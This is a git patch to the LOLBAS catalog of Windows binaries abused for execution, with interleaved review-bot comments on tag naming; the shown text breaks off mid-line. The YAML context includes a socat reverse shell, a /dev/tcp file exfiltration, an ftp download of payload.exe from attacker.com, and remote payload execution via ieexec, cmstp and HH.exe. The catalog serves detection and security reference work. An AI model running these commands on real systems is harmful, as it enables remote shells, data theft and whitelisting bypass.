From b9a6cd6a87cbd8e6c29b5cef62d9a430b88979a6 Mon Sep 17 00:00:00 2001 
From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 29 Dec 2024 18:31:01 +0100 Subject: [PATCH] Adding Execute tags to most LOLBas (#405) --- yml/OSBinaries/Addinutil.yml | 2 ++ yml/OSBinaries/At.yml | 2 ++ yml/OSBinaries/Atbroker.yml | 2 ++ yml/OSBinaries/Bash.yml | 8 +++++ yml/OSBinaries/Cmstp.yml | 5 +-- yml/OSBinaries/Conhost.yml | 4 +++ yml/OSBinaries/Control.yml | 9 +++++ yml/OSBinaries/CustomShellHost.yml | 2 ++ yml/OSBinaries/Dfsvc.yml | 3 ++ yml/OSBinaries/Diskshadow.yml | 4 +++ yml/OSBinaries/Dnscmd.yml | 1 + yml/OSBinaries/Esentutl.yml | 1 - yml/OSBinaries/Eventvwr.yml | 2 ++ yml/OSBinaries/Explorer.yml | 4 +++ yml/OSBinaries/Forfiles.yml | 4 +++ yml/OSBinaries/Fsutil.yml | 2 ++ yml/OSBinaries/Ftp.yml | 2 ++ yml/OSBinaries/Gpscript.yml | 4 +++ yml/OSBinaries/Hh.yml | 17 ++++++++++ yml/OSBinaries/Ie4uinit.yml | 2 ++ yml/OSBinaries/Iediagcmd.yml | 2 ++ yml/OSBinaries/Ieexec.yml | 6 ++++ yml/OSBinaries/Infdefaultinstall.yml | 2 ++ yml/OSBinaries/Installutil.yml | 8 ++--- yml/OSBinaries/Jsc.yml | 4 +-- .../Microsoft.Workflow.Compiler.yml | 7 ++++ yml/OSBinaries/Mmc.yml | 4 +++ yml/OSBinaries/Msbuild.yml | 8 ++++- yml/OSBinaries/Msconfig.yml | 2 ++ yml/OSBinaries/Msdt.yml | 3 ++ yml/OSBinaries/Msedge.yml | 2 ++ yml/OSBinaries/Mshta.yml | 9 +++-- yml/OSBinaries/Msiexec.yml | 11 +++++++ yml/OSBinaries/Pcalua.yml | 5 +++ yml/OSBinaries/Pcwrun.yml | 4 +++ yml/OSBinaries/Pnputil.yml | 2 ++ yml/OSBinaries/Presentationhost.yml | 2 ++ yml/OSBinaries/Provlaunch.yml | 2 ++ yml/OSBinaries/Regasm.yml | 8 ++--- yml/OSBinaries/Regsvcs.yml | 10 +++--- yml/OSBinaries/Regsvr32.yml | 10 ++++++ yml/OSBinaries/Rundll32.yml | 21 ++++-------- yml/OSBinaries/Runexehelper.yml | 2 ++ yml/OSBinaries/Runonce.yml | 2 ++ yml/OSBinaries/Runscripthelper.yml | 2 ++ yml/OSBinaries/Sc.yml | 4 +++ yml/OSBinaries/Schtasks.yml | 4 +++ yml/OSBinaries/Scriptrunner.yml | 5 +++ yml/OSBinaries/Setres.yml | 2 ++ yml/OSBinaries/SettingSyncHost.yml | 4 +++ yml/OSBinaries/Ssh.yml | 4 
+++ yml/OSBinaries/Stordiag.yml | 4 +++ yml/OSBinaries/Syncappvpublishingserver.yml | 2 ++ yml/OSBinaries/Ttdinject.yml | 4 +++ yml/OSBinaries/Tttracer.yml | 2 ++ yml/OSBinaries/Unregmp2.yml | 2 ++ yml/OSBinaries/Vbc.yml | 4 --- yml/OSBinaries/Verclsid.yml | 2 ++ yml/OSBinaries/Wab.yml | 2 ++ yml/OSBinaries/Winget.yml | 3 ++ yml/OSBinaries/Wlrmdr.yml | 2 ++ yml/OSBinaries/Wmic.yml | 13 +++++++- yml/OSBinaries/WorkFolders.yml | 2 ++ yml/OSBinaries/Xwizard.yml | 4 +++ yml/OSBinaries/msedge_proxy.yml | 2 ++ yml/OSBinaries/msedgewebview2.yml | 8 +++++ yml/OSBinaries/wt.yml | 2 ++ yml/OSLibraries/Advpack.yml | 8 ++++- yml/OSLibraries/Desk.yml | 5 +++ yml/OSLibraries/Dfshim.yml | 3 ++ yml/OSLibraries/Ieadvpack.yml | 8 +++++ yml/OSLibraries/Ieframe.yml | 2 ++ yml/OSLibraries/Mshtml.yml | 2 ++ yml/OSLibraries/Pcwutl.yml | 2 ++ yml/OSLibraries/Setupapi.yml | 4 +-- yml/OSLibraries/Shdocvw.yml | 2 ++ yml/OSLibraries/Shell32.yml | 4 +++ yml/OSLibraries/Syssetup.yml | 4 +-- yml/OSLibraries/Url.yml | 12 +++++++ yml/OSLibraries/Zipfldr.yml | 4 +++ yml/OSScripts/CL_LoadAssembly.yml | 2 +- yml/OSScripts/CL_mutexverifiers.yml | 2 ++ yml/OSScripts/Cl_invocation.yml | 2 ++ yml/OSScripts/Launch-VsDevShell.yml | 4 +++ yml/OSScripts/Manage-bde.yml | 4 +++ yml/OSScripts/Pubprn.yml | 2 ++ yml/OSScripts/Syncappvpublishingserver.yml | 2 ++ yml/OSScripts/UtilityFunctions.yml | 2 +- yml/OSScripts/Winrm.yml | 8 +++++ yml/OSScripts/pester.yml | 11 +++---- yml/OtherMSBinaries/AccCheckConsole.yml | 4 +-- yml/OtherMSBinaries/Adplus.yml | 5 +++ yml/OtherMSBinaries/Agentexecutor.yml | 4 +++ yml/OtherMSBinaries/Appcert.yml | 4 +++ yml/OtherMSBinaries/Appvlp.yml | 6 ++++ yml/OtherMSBinaries/Bginfo.yml | 2 ++ yml/OtherMSBinaries/Cdb.yml | 6 ++++ yml/OtherMSBinaries/Coregen.yml | 2 ++ yml/OtherMSBinaries/Csi.yml | 2 ++ yml/OtherMSBinaries/DefaultPack.yml | 2 ++ yml/OtherMSBinaries/Devinit.yml | 3 ++ yml/OtherMSBinaries/Devtoolslauncher.yml | 4 +++ yml/OtherMSBinaries/Dnx.yml | 2 ++ 
yml/OtherMSBinaries/Dotnet.yml | 8 +++++ yml/OtherMSBinaries/Dxcap.yml | 2 ++ yml/OtherMSBinaries/Fsi.yml | 4 +++ yml/OtherMSBinaries/FsiAnyCpu.yml | 4 +++ yml/OtherMSBinaries/Mftrace.yml | 4 +++ .../Microsoft.NodejsTools.PressAnyKey.yml | 2 ++ yml/OtherMSBinaries/Msdeploy.yml | 4 +++ yml/OtherMSBinaries/Msxsl.yml | 10 ++++++ yml/OtherMSBinaries/OpenConsole.yml | 2 ++ yml/OtherMSBinaries/Rcsi.yml | 4 +++ yml/OtherMSBinaries/Remote.yml | 7 ++++ yml/OtherMSBinaries/Sqlps.yml | 2 ++ yml/OtherMSBinaries/Sqltoolsps.yml | 2 ++ yml/OtherMSBinaries/Squirrel.yml | 12 +++++++ yml/OtherMSBinaries/Te.yml | 2 ++ yml/OtherMSBinaries/Teams.yml | 6 ++++ yml/OtherMSBinaries/Update.yml | 33 +++++++++++++++++++ yml/OtherMSBinaries/VSDiagnostics.yml | 4 +++ yml/OtherMSBinaries/VSIISExeLauncher.yml | 2 ++ yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 2 ++ yml/OtherMSBinaries/VsLaunchBrowser.yml | 5 +++ yml/OtherMSBinaries/Vshadow.yml | 2 ++ yml/OtherMSBinaries/Vsjitdebugger.yml | 2 ++ yml/OtherMSBinaries/Wfc.yml | 2 ++ yml/OtherMSBinaries/Wsl.yml | 6 ++++ yml/OtherMSBinaries/winfile.yml | 2 ++ 129 files changed, 520 insertions(+), 59 deletions(-) diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml index 909f7aa57..255647650 100644 --- a/yml/OSBinaries/Addinutil.yml +++ b/yml/OSBinaries/Addinutil.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: .NetObjects Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index eb9743cc3..80c5faaf5 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: Local Admin MitreID: T1053.002 OperatingSystem: Windows 7 or older + Tags: + - Execute: CMD Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index dff336889..d8f50647b 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index d257f752d..ec33fe020 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverseshell Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 903ec7375..5bd76aacb 100644 
--- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. @@ -21,7 +21,8 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Input: INF + - Execute: INF + - Execute: Remote Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 2ee2b75c8..cd076da41 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\conhost.exe Detection: diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 7f4e162a8..a4864587e 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml 
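Review bot: `- Execute: CMD` is the tag chosen for the `conhost.exe --headless calc.exe` entry (Conhost hunk at -18), whereas the equivalent proxy launches of a binary in Explorer.yml (`explorer.exe C:\Windows\System32\notepad.exe`) and Forfiles.yml are tagged `- Execute: EXE` in this same patch, and Diskshadow's `exec calc.exe` entry gets `CMD` as well. If the Execute tag is meant to name the payload type, these should agree, e.g. `- Execute: EXE` for the conhost and diskshadow entries. The first conhost entry's command sits above the hunk, so I cannot tell which value fits there.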
@@ -13,6 +13,15 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Command: control.exe c:\windows\tasks\evil.cpl + Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) + Usecase: Use to execute code and bypass application whitelisting + Category: Execute + Privileges: User + MitreID: T1218.002 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 69d11cbf5..7390b3568 100644 --- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\CustomShellHost.exe Detection: diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 2a1cb9d1f..ab8ca266f 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: ClickOnce + - Execute: Remote Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index 7fb9a184d..c54501fad 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1003.003 OperatingSystem: Windows server + Tags: + - Execute: CMD - Command: diskshadow> exec calc.exe Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures 
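Review bot: The new Description line in Control.yml has an unbalanced parenthesis: `Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)`. Suggest `Description: Execute evil.cpl payload. A CPL is a DLL file with a CPlApplet export function.` The rest of the new entry (Category, Privileges, MitreID T1218.002, Tags) mirrors the existing entry above it, which reads consistently.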
@@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows server + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 27f0d0159..613ce7619 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows server Tags: - Execute: DLL + - Execute: Remote Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index e3328c1ff..378d7c287 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -46,7 +46,6 @@ Commands: Privileges: Admin MitreID: T1003.003 OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server - Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index e0a46a32e..d8beeeaed 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: EXE - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. 
@@ -22,6 +23,7 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: .NetObjects Full_Path: - Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 829f2f895..1c0e2ff30 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: explorer.exe C:\Windows\System32\notepad.exe Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 51a084c39..a23687212 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream 
@@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml index 63ef85914..e4b38ed1d 100644 --- a/yml/OSBinaries/Fsutil.yml +++ b/yml/OSBinaries/Fsutil.yml @@ -25,6 +25,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\fsutil.exe - Path: C:\Windows\SysWOW64\fsutil.exe diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 62b9a828b..6b4828bf8 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index fba5f6fe0..3ac6adcbb 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures 
@@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index f6db4701e..27af482fc 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Application: GUI - Command: HH.exe c:\windows\system32\calc.exe Description: Executes calc.exe with HTML Help. Usecase: Execute process with HH.exe @@ -18,6 +21,20 @@ Commands: Privileges: User MitreID: T1218.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Application: GUI + - Command: HH.exe http://some.url/payload.chm + Description: Executes a remote payload.chm file which can contain commands. + Usecase: Execute commands with HH.exe + Category: Execute + Privileges: User + MitreID: T1218.001 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: CHM + - Execute: Remote Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index 461fbca21..80c6cc52d 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: INF Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml index b1d47d4b4..056e30eee 100644 --- a/yml/OSBinaries/Iediagcmd.yml 
+++ b/yml/OSBinaries/Iediagcmd.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Internet Explorer\iediagcmd.exe Detection: diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 0987d2b19..f397b3703 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: Remote + - Execute: EXE (.NET) - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: Remote + - Execute: EXE (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 4c8668811..d0f129a86 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -11,6 +11,8 @@ Commands: Privileges: Admin MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: INF Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 40d9a442a..c9f29fe2a 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml 
@@ -12,8 +12,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting @@ -22,8 +22,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index b4e719837..3a5f5a603 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript - Command: jsc.exe /t:library Library.js Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index c26c0c2eb..cd128954d 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml 
@@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: VB.Net + - Execute: Csharp - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -18,6 +21,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: XOML - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -25,6 +30,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: XOML Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 7dfdb8d8c..dab5e4996 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 + Tags: + - Execute: COM - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 62d95ffe9..04ff916b6 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml 
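Review bot: `- Execute: Csharp` in Microsoft.Workflow.Compiler.yml (hunk at -11) and `- Execute: CSharp` in Msbuild.yml (hunks at -11 and -18) spell the same tag differently; if tags are matched literally for filtering or site rendering, the two tools will land in separate buckets. Change this line to `- Execute: CSharp` (or the Msbuild lines to match). The patch also introduces `.NetObjects`, `EXE (.NET)` and `DLL (.NET)` for .NET payloads in Addinutil, Eventvwr, Ieexec and Installutil; settling on one vocabulary before merge would avoid the same fragmentation.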
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CSharp - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CSharp - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL @@ -35,7 +39,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - 